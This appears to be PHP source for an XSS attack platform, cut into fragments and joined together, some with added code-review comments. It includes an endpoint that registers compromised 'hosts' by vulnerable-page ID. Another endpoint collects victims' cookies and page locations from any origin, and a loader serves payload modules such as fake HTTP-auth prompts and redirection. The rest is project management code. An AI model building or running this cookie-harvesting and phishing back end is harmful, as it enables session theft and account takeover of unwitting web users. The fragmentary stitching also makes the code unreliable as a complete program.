$current_url = get_url(); $URI = substr($current_url, strlen(PMX_SITEURL), strlen($current_url) - strlen(PMX_SITEURL)); $uri = explode('/', $URI); $saltid = substr($uri[2], 0, 8); // 项目字符串ID if (count($uri) < 4) { header('Content-Type: text/javascript; charset=utf-8'); die("/*null*/"); } if (strlen($uri[3]) != 50) { header('Content-Type: text/javascript; charset=utf-8'); die("/*null*/"); } $sid = $uri[3]; // XSS漏洞页字符串ID $pmxProj = new pmxProject(); $pmxHost = new pmxHost(); if ($pmxProj->isExistSaltID($saltid) == FALSE) { header('Content-Type: text/javascript; charset=utf-8'); die("/*null*/"); } $pid = $pmxProj->getIDbySlatID($saltid); /** * 判断是否第一次上线 */ if ($pmxHost->isExistSaltID($sid) == FALSE) { $pmxHost->addHost($pid, $sid); // 添加主机 } else { $pmxHost->updateHost($sid); // 更新主机信息
<?php /** Prevent user from loading inc. file */ define("PMX_ENTRANCE", true); require dirname(__FILE__) . '/public-init.php'; header("Access-Control-Allow-Origin:*"); header('Content-Type: text/json; charset=utf-8'); $current_url = get_url(); $URI = substr($current_url, strlen(PMX_SITEURL), strlen($current_url) - strlen(PMX_SITEURL)); $uri = explode('/', $URI); $saltid = substr($uri[2], 0, 8); $pmxProj = new pmxProject(); if ($pmxProj->isExistSaltID($saltid) == FALSE) { exit; } $id = $pmxProj->getIDbySlatID($saltid); $detail = $pmxProj->getDetail($id); if ($detail['status'] == 0) { exit; } $request_data = isset($_REQUEST) ? $_REQUEST : array(); $location = isset($_REQUEST["location"]) ? $_REQUEST["location"] : ""; $toplocation = isset($_REQUEST["toplocation"]) ? $_REQUEST["toplocation"] : ""; $cookies = isset($_REQUEST["cookies"]) ? $_REQUEST["cookies"] : ""; if (isset($request_data["location"])) { unset($request_data["location"]); } if (isset($request_data["toplocation"])) { unset($request_data["toplocation"]); } if (isset($request_data["cookies"])) {
// NOTE(review): this excerpt starts inside nested blocks that were opened before the visible text;
// the first closing braces below belong to those blocks and are reproduced unchanged.
                }
            } else {
                // Read the POST field named "mod_<$modid_item>_<$var>" and, when present,
                // record it as a (module id, setting name, value) triple.
                // The value is taken from $_POST as-is; no validation is visible at this point.
                if (isset($_POST["mod_" . $modid_item . "_" . $var])) {
                    $val = $_POST["mod_" . $modid_item . "_" . $var];
                    $modconfig[] = array($modid_item, $var, $val);
                }
            }
        }
    }
}

/**
 * Check that the submitted values are complete and valid.
 *
 * NOTE(review): in_array() is called without its strict flag, so the comparison is loose (==).
 * Whether that admits unexpected values depends on the types stored in the $allow_* lists,
 * which are defined outside this excerpt; confirm.
 */
if ($title == ""
    || !in_array($status, $allow_optionStatus)
    || !in_array($protect, $allow_optionProtect)
    || !in_array($mailAlert, $allow_optionMail)) {
    die("Error: Something you input is invalid.");
}

// NOTE(review): $desc, $mail, $comments, $modid and $modconfig reach pmxProject without any check
// visible in this excerpt; confirm they are validated or escaped where they are stored and displayed.
$pmxProj = new pmxProject($title, $desc, $status, $protect, $mailAlert, $mail, $comments, $modid, $modconfig);

/**
 * Reject a project name that already exists.
 */
if ($pmxProj->isExistName($title) == TRUE) {
    die("Error: Duplicate project name.");
}

/**
 * Add the project and report the outcome.
 * $title is passed through esc_html() (defined elsewhere; presumably HTML-escapes) before it is echoed back.
 */
if ($pmxProj->addProj() == TRUE) {
    echo "Success: You have added project \"" . esc_html($title) . "\" successful";
} else {
    echo "Error: Sorry. We are fail to add the project \"" . esc_html($title) . "\".";
}
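<?php
/**
 * Start a project.
 *
 * This file answers with a 404 unless PMX_ENTRANCE is defined, so it only runs when it is
 * included by a script that defines that constant.
 *
 * Input:  $_GET["id"] - project id, coerced to an integer.
 * Output: a one-line "Success: ..." or "Error: ..." message as text/html.
 *
 * NOTE(review): the id is read from $_GET, so this state change is triggered by a GET request.
 * The pmx_validate_token() check (defined elsewhere; presumably an anti-CSRF token, confirm) is
 * the only request-forgery guard visible in this file.
 */
if (!defined("PMX_ENTRANCE")) {
    header("HTTP/1.0 404 Not Found");
    exit;
}

header('Content-Type: text/html; charset=utf-8');

// Refuse the action before touching any project data when the token check fails.
if (!pmx_validate_token()) {
    die("Error: Token is incorrect.");
}

// intval() guarantees an integer, so $id can be echoed into the HTML response without escaping.
$id = isset($_GET["id"]) ? intval($_GET["id"]) : NULL;

$pmxProj = new pmxProject();
if (!$pmxProj->isExistID($id)) {
    die("Error: The project id is non-existent.");
}

if ($pmxProj->startProj($id)) {
    echo "Success: You have started the project {$id} successful.";
} else {
    // A failed start used to produce an empty response; report it with the same "Error:" prefix
    // the other branches use so the caller can tell failure from success.
    echo "Error: Failed to start the project {$id}.";
}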
<?php if (!defined("PMX_ENTRANCE")) { header("HTTP/1.0 404 Not Found"); exit; } pmx_require_header("Edit Project"); pmx_require_nav(""); $id = isset($_GET["id"]) ? intval($_GET["id"]) : NULL; $pmxProj = new pmxProject(); if (!$pmxProj->isExistID($id)) { die("Error: The Project id is non-existent."); } $data = $pmxProj->getDetail($id); $modids = json_decode($data['mods'], true); ?> <div class="main"> <div class="main-item-single main-item-add-proj pull-left"> <form class="form-horizontal" id="form-add-proj" action="<?php echo pmx_getactionurl_saveproj(); ?> " method="POST" role="form"> <div class="main-item-single-left main-item-single-addproj-setting pull-left"> <div class="add-proj-item add-proj-item-1"> <div class="form-group"> <label for="inputTitle" class="col-sm-2 control-label">Title</label> <div class="col-sm-9"> <input type="text" name="title" class="form-control"
<?php /** Prevent user from loading inc. file */ define("PMX_ENTRANCE", true); require dirname(__FILE__) . '/public-init.php'; $current_url = get_url(); $URI = substr($current_url, strlen(PMX_SITEURL), strlen($current_url) - strlen(PMX_SITEURL)); if (substr($URI, 0, 1) !== '/') { $URI = '/' . $URI; } $uri = explode('/', $URI); $saltid = substr($uri[2], 0, 8); $pmxProj = new pmxProject(); if ($pmxProj->isExistSaltID($saltid) == FALSE) { header('Content-Type: text/javascript; charset=utf-8'); die("/*null*/"); } $id = $pmxProj->getIDbySlatID($saltid); $detail = $pmxProj->getDetail($id); $mods = json_decode($detail['mods'], true); if ($detail['status'] == 0) { header('Content-Type: text/javascript; charset=utf-8'); die("/*null*/"); } $code = $pmxProj->getCode($id); if (count($mods) == 1 && strpos($code, "{pmx.system.module.")) { // 判断是否为系统模块 $mod_httpauth_id = 34; $mod_srcredirection_id = 31; $mod_config = $pmxProj->getConfig($id); if (strpos($code, "{pmx.system.module.httpauth}")) {
// NOTE(review): this excerpt starts inside a block opened before the visible text (see the extra
// closing brace after the loop). Any access or token check earlier in the file is not visible here;
// confirm one is performed before these POST values are processed.

    // Collect per-module settings from the POST body into $modconfig as
    // (module id, setting name, value) triples.
    foreach ($modid as $modid_item) {
        if (isset($_POST["mod_" . $modid_item])) {
            // "mod_<id>" carries either one setting name or an array of setting names.
            $var = $_POST["mod_" . $modid_item];
            if (is_array($var)) {
                foreach ($var as $var_item) {
                    // The value for each named setting is looked up in "mod_<id>_<name>".
                    // NOTE(review): $var_item is client-supplied and is concatenated into the key
                    // without a type check; confirm nested arrays are rejected upstream.
                    if (isset($_POST["mod_" . $modid_item . "_" . $var_item])) {
                        $val = $_POST["mod_" . $modid_item . "_" . $var_item];
                        $modconfig[] = array($modid_item, $var_item, $val);
                    }
                }
            } else {
                if (isset($_POST["mod_" . $modid_item . "_" . $var])) {
                    $val = $_POST["mod_" . $modid_item . "_" . $var];
                    $modconfig[] = array($modid_item, $var, $val);
                }
            }
        }
    }
} // closes a block opened before this excerpt

// Reject incomplete or out-of-range input before building the project object.
// NOTE(review): in_array() is called without its strict flag, so the comparison is loose (==).
// Whether that admits unexpected values depends on the types stored in the $allow_* lists,
// which are defined outside this excerpt; confirm.
if ($id == ""
    || $title == ""
    || !in_array($status, $allow_optionStatus)
    || !in_array($protect, $allow_optionProtect)
    || !in_array($mailAlert, $allow_optionMail)) {
    die("Error: Something you input is invalid.");
}

// NOTE(review): $desc, $mail, $comments, $modid and $modconfig reach pmxProject without any check
// visible in this excerpt; confirm they are validated or escaped where they are stored and displayed.
$pmxProj = new pmxProject($title, $desc, $status, $protect, $mailAlert, $mail, $comments, $modid, $modconfig);

// The project being edited must already exist.
if ($pmxProj->isExistID($id) == FALSE) {
    die("Error: Project id is invalid.");
}

// Save the changes and report the outcome. $title is passed through esc_html() (defined elsewhere;
// presumably HTML-escapes) before it is echoed back.
if ($pmxProj->updateProj($id) == TRUE) {
    echo "Success: You have updated project \"" . esc_html($title) . "\" successful";
} else {
    echo "Error: Sorry. We are fail to update the project \"" . esc_html($title) . "\".";
}
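<?php
/**
 * Delete a project.
 *
 * This file answers with a 404 unless PMX_ENTRANCE is defined, so it only runs when it is
 * included by a script that defines that constant.
 *
 * Input:  $_GET["id"] - project id, coerced to an integer.
 * Output: a one-line "Success: ..." or "Error: ..." message as text/html.
 *
 * NOTE(review): the id is read from $_GET, so this destructive action is triggered by a GET
 * request. The pmx_validate_token() check (defined elsewhere; presumably an anti-CSRF token,
 * confirm) is the only request-forgery guard visible in this file.
 */
if (!defined("PMX_ENTRANCE")) {
    header("HTTP/1.0 404 Not Found");
    exit;
}

header('Content-Type: text/html; charset=utf-8');

// Refuse the action before touching any project data when the token check fails.
if (!pmx_validate_token()) {
    die("Error: Token is incorrect.");
}

// intval() guarantees an integer, so $id can be echoed into the HTML response without escaping.
$id = isset($_GET["id"]) ? intval($_GET["id"]) : NULL;

$pmxProj = new pmxProject();
if (!$pmxProj->isExistID($id)) {
    die("Error: The project id is non-existent.");
}

if ($pmxProj->delProj($id)) {
    echo "Success: You have deleted the project {$id} successful.";
} else {
    // A failed delete used to produce an empty response; report it with the same "Error:" prefix
    // the other branches use so the caller can tell failure from success.
    echo "Error: Failed to delete the project {$id}.";
}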